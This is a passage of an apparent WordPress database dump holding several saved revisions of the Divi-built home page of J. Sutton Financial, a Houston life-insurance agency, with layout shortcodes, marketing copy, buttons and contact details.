global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:51:30','2023-04-03 23:51:30','',138,'http://cmdev-site1.com/?p=734',0,'revision','',0),(692,1,'2023-04-03 23:08:06','2023-04-03 23:08:06','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||12px||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-03 23:08:06','2023-04-03 23:08:06','',138,'http://cmdev-site1.com/?p=692',0,'revision','',0),(691,1,'2023-04-03 23:05:01','2023-04-03 23:05:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" min_height=\"709.9px\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||12px||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" custom_margin=\"||152px|||\" global_colors_info=\"{}\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][dsm_button button_one_text=\"Get a Quote today!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjIyNSJ9fQ==@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" 